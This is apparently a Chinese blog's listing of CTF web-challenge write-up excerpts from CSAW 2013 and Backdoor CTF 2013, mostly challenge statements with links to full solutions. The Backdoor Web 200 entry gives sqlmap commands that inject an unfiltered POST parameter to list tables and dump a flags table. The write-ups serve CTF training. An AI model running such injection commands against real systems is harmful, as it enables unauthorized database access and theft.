CSAW CTF Qualification Round 2013: Web 200 Nevernote

作者: 分类: CTF 评论: 暂无 时间: 2016-08-19 浏览: 4,980 次

0x00 题目

来自网站http://128.238.66.214的管理员Nevernote Admin<nevernoteadmin@nevernote.com>
发往邮箱challenger@ctf.isis.poly.edu
时间:2013年9月19日 星期四 15:05
主题:求助

亲爱的小伙伴:
邪恶的黑客已经控制了我的Nevernote网站服务器并且锁定了我的管理帐户是我不能登入,我正在尝试恢复访问,你有没有办法登入我的帐户帮我把notes保存下来吗?虽说网站的安全性较高,但是对于你应该没有问题,我看好你,加油!
..........................................................................................................................................谢谢,Nevernote网站管理员

0x01 解题

阅读全文»

CSAW CTF Qualification Round 2013: Web 100 Guess Harder

作者: 分类: CTF 评论: 暂无 时间: 2016-08-19 浏览: 2,358 次

0x00 题目

http://128.238.66.215

0x01 解题

阅读全文»

Backdoor CTF 2013: Web 300

作者: 分类: CTF 评论: 暂无 时间: 2016-08-13 浏览: 3,125 次

0x00 题目

H4x0r的网站系统需要积分,为你账号获得积分从而获取flag,你可以审计一波网站系统源代码
提示:管理员有一堆积分,就看你能不能用了。

0x01 解题

阅读全文»

Backdoor CTF 2013: Web 500

作者: 分类: CTF 评论: 暂无 时间: 2016-08-13 浏览: 2,281 次

0x00 题目

有人提醒了H4x0r他的Web150新闻网站存在漏洞,所以H4x0r加固了网站。你现在需要找到网站管理用户的密码散列从而得到flag。

阅读全文»

Backdoor CTF 2013: Web 200

作者: 分类: CTF 评论: 暂无 时间: 2016-08-13 浏览: 1,576 次

0x00 题目

H4x0r在某个地方藏了一个flag,找到flag

0x01 解题

post的q参数没有过滤处理:

sqlmap.py -u http://backdoor-problems.cognizance.org.in/web200/submit.php --data q=a -p q --threads 10
sqlmap.py -u http://backdoor-problems.cognizance.org.in/web200/submit.php --data q=a -p q --threads 10 --tables
sqlmap.py -u http://backdoor-problems.cognizance.org.in/web200/submit.php --data q=a -p q --threads 10 --sql-query="select * from flags"